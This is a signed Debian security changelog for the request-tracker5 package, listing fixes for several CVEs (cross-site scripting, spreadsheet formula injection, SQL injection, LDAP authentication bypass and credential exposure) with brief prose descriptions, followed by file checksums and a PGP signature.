-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Mon, 01 Jun 2026 13:10:39 +1200
Source: request-tracker5
Architecture: source
Version: 5.0.7+dfsg-4+deb13u3
Distribution: trixie-security
Urgency: high
Maintainer: Andrew Ruthven <andrew@etc.gen.nz>
Changed-By: Andrew Ruthven <andrew@etc.gen.nz>
Changes:
request-tracker5 (5.0.7+dfsg-4+deb13u3) trixie-security; urgency=high
.
* Include missing default configuration items for security vulnerability
fixes included in 5.0.7+dfsg-3. Namely: RestrictLinkDomains and Cipher
in %SMIME.
* Apply upstream patch which fixes several security vulnerabilities:
- [CVE-2026-6841] Reflected cross-site scripting via the search "Page" URL
parameter.
- [CVE-2026-41073] Spreadsheet (CSV/formula) injection via ticket values
that are exported to a spreadsheet from search results. User-controlled
data is not sanitized before being written to the output file, which can
cause spreadsheet applications such as Microsoft Excel to interpret
crafted values as formulas or macros when the file is opened.
- [CVE-2026-41075] SQL injection via the entry_aggregator parameter in JSON
search. An authenticated user can craft input that is incorporated into
database queries without proper validation, potentially allowing them to
read or modify data in the RT database.
- [CVE-2026-41076] LDAP authentication bypass when RT is configured to
authenticate users against an LDAP or Active Directory server. Under
certain LDAP server configurations, an attacker may be able to
authenticate as any LDAP-backed RT user without supplying valid
credentials.
- [CVE-2026-44229] Cross-site scripting via uploaded content that is served
inline rather than as an attachment.
- [CVE-2026-44230] Reflected cross-site scripting on search-results chart
pages.
- [CVE-2026-44231] Privilege escalation and information disclosure via the
REST 2.0 user collection endpoint. A Privileged RT user can obtain
authentication credentials belonging to other users, including
administrators, and use those credentials to read data via RT's RSS and
iCal feed endpoints. The same request that exposes the credentials also
rotates them, which invalidates previously-distributed feed URLs across
the instance.
Checksums-Sha1:
6186d5d0ff42c2897ce5590ebd407e3b75c31d92 6044 request-tracker5_5.0.7+dfsg-4+deb13u3.dsc
3a56fb5d1f787d3f4b957003a3851cffcc44bde0 137108 request-tracker5_5.0.7+dfsg-4+deb13u3.debian.tar.xz
655f651e7cd57480b67401572780a40ed290cfdd 25034 request-tracker5_5.0.7+dfsg-4+deb13u3_amd64.buildinfo
Checksums-Sha256:
5bad08a8208c96a196add245d58f2ccef116d33cca13cb7981161ecf5219a05c 6044 request-tracker5_5.0.7+dfsg-4+deb13u3.dsc
ac6a18c81fab5c044f6649780fd4883705cd71edc7340a3a60128a1704a62095 137108 request-tracker5_5.0.7+dfsg-4+deb13u3.debian.tar.xz
263f00f84f846d10bdac5646429a0b8fcdd88557c0997954dc7b1a1aedbfee26 25034 request-tracker5_5.0.7+dfsg-4+deb13u3_amd64.buildinfo
Files:
c74292d0e9251a226184685b8f437269 6044 misc optional request-tracker5_5.0.7+dfsg-4+deb13u3.dsc
44420d134af2f050fd025bbf4da073f6 137108 misc optional request-tracker5_5.0.7+dfsg-4+deb13u3.debian.tar.xz
95c31e7d4e33339b68ee04530bd3030d 25034 misc optional request-tracker5_5.0.7+dfsg-4+deb13u3_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEExgP8TmAPHOzRyNl8S1PZMeTT6GMFAmoj9dMACgkQS1PZMeTT
6GPjtQ/7BCmBTSOk7hKo8U4hAyoriUSpDRdFydiGdVYR033aTV6K4XdgtyYJqhUB
Ad3vtPC+TWK4qQzFoWUa2bX/qPbKnEZyZgaHWKpoPku+D+ev6TI+R5g18CL+yW1U
09GGyci0mRY7qUXvAM2prxNbS4P3xjWrCZ3rg4E2n7QrYQ48zCtt0Ha2zX8ulIMq
6sYjXOVVluoZZGa9F8Ft0jUX3XKtBo+7roLz9O05NewjMViSEtI5EjXKkPeLuJCu
rmZztOcx7ho4lPm1JXve38pc/GGkY+999SjZuq/5+AmyeHIxXvetOfCsayyB1kHd
enPHQkG+SfIwBIDJJqc9f4QSV6O1UJAYkizZ9invREUWhEDlfZY5uo/KwwxXVX5/
jusP+bOofO+N7QYZ4ffm19n/8xvyvHfr6cEY7wgiVGJJ68GkUyXEDiNFcI88Pqc/
YXPldMkEE7O1oH3vfe/iuFX4/JtkftW4r+BzMFVtff4KVuDnJWu6n5Za8D+gatxc
74JERh2QOg19OsesYr/Mqly20tSmGd6Bxyn93E8vOHYHQGTWmvWoA0spkVfwqWhu
oh8ldSyRKbf9q3qB2bk944UsUKKq6a2DMgM9j6YCHxoO6MV1MRF1YlHkCUobp77U
ArfTsYXKKo+fMQ5uef+yq0reLbw+Th+KHNXwKrkvYy3Rphp8RM8=
=6op4
-----END PGP SIGNATURE-----
